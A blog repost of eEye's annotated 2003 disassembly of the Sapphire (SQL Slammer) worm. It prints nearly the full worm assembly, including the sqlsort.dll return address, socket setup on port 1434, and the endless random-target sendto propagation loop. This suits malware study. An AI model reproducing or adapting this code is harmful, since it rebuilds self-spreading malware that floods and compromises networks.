关闭

2003蠕虫王反汇编代码

标签: 汇编algorithmrandomsocketdllsecurity
975人阅读 评论(0) 收藏 举报
分类:

;SAPPHIRE WORM CODE DISASSEMBLED
;eEye Digital Security: January 25, 2003


        push    42B0C9DCh       ; [RET] sqlsort.dll -> jmp esp
                mov     eax, 1010101h   ; Reconstruct session, after the overflow the payload buffer
                                        ; get s corrupted during program execution but before the
                                        ; payload is executed. .
                xor     ecx, ecx
                mov     cl, 18h

FIXUP:
                push    eax
                loop    FIXUP
                xor     eax, 5010101h
                push    eax
                mov     ebp, esp
                push    ecx           
                push    6C6C642Eh
                push    32336C65h
                push    6E72656Bh       ; kernel32
                push    ecx
                push    746E756Fh       ; GetTickCount
                push    436B6369h
                push    54746547h
                mov     cx, 6C6Ch
                push    ecx
                push    642E3233h       ; ws2_32.dll
                push    5F327377h
                mov     cx, 7465h
                push    ecx
                push    6B636F73h       ; socket
                mov     cx, 6F74h
                push    ecx
                push    646E6573h       ; sendto
                mov     esi, 42AE1018h  ; IAT from sqlsort
                lea     eax, [ebp-2Ch]  ; (ws2_32.dll)
                push    eax
                call    dword ptr [esi] ; call loadlibrary
                push    eax
                lea     eax, [ebp-20h]
                push    eax
                lea     eax, [ebp-10h]  ; (kernel32.dll)
                push    eax
                call    dword ptr [esi] ; loadlibrary
                push    eax
                mov     esi, 42AE1010h  ; IAT from sqlsort
                mov     ebx, [esi]
                mov     eax, [ebx]
                cmp     eax, 51EC8B55h  ; check entry point fingerprint
                jz      short VALID_GP  ; Check entry point fingerprint for getprocaddress, if it failes
                                        ; fall back to GetProcAddress entry in another DLL version.
                                        ; Undetermined what dll versions this will succedd on. Due
                                        ; to the lack of reliable importing this may not work across all
                                        ; dll versions.
                mov     esi, 42AE101Ch  ; IAT entry -> 77EA094C

VALID_GP:                            
                call    dword ptr [esi] ; GetProcAddress
                call    eax             ; return from GetProcaddress = GetTickCount entrypoint
                xor     ecx, ecx
                push    ecx
                push    ecx
                push    eax
                xor     ecx, 9B040103h
                xor     ecx, 1010101h
                push    ecx             ; 9A050002 = port 1434 / AF_INET
                lea     eax, [ebp-34h]  ; (socket)
                push    eax
                mov     eax, [ebp-40h]  ; ws2_32 base address
                push    eax
                call    dword ptr [esi] ; GetProcAddress
                push    11h
                push    2
                push    2
                call    eax             ; socket
                push    eax
                lea     eax, [ebp-3Ch]  ; sendto
                push    eax
                mov     eax, [ebp-40h]  ; ws2_32 base address
                push    eax
                call    dword ptr [esi] ; GetProcAddress
                mov     esi, eax        ; save sendto -> esi
                or      ebx, ebx       
                xor     ebx, 0FFD9613Ch

PRND:                                
                mov     eax, [ebp-4Ch]  ; Pseudo Random Algorithm Start
                lea     ecx, [eax+eax*2]
                lea     edx, [eax+ecx*4]
                shl     edx, 4
                add     edx, eax
                shl     edx, 8
                sub     edx, eax
                lea     eax, [eax+edx*4]
                add     eax, ebx        ; Pseudo Random Algorithm End
                mov     [ebp-4Ch], eax
                push    10h
                lea     eax, [ebp-50h]
                push    eax
                xor     ecx, ecx
                push    ecx
                xor     cx, 178h
                push    ecx
                lea     eax, [ebp+3]
                push    eax
                mov     eax, [ebp-54h]
                push    eax
                call    esi             ; sendto
                jmp     short PRND    ; Jump back to Pseudo Random Algorithm Start 

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:33628次
    • 积分:394
    • 等级:
    • 排名:千里之外
    • 原创:3篇
    • 转载:14篇
    • 译文:0篇
    • 评论:4条
    最新评论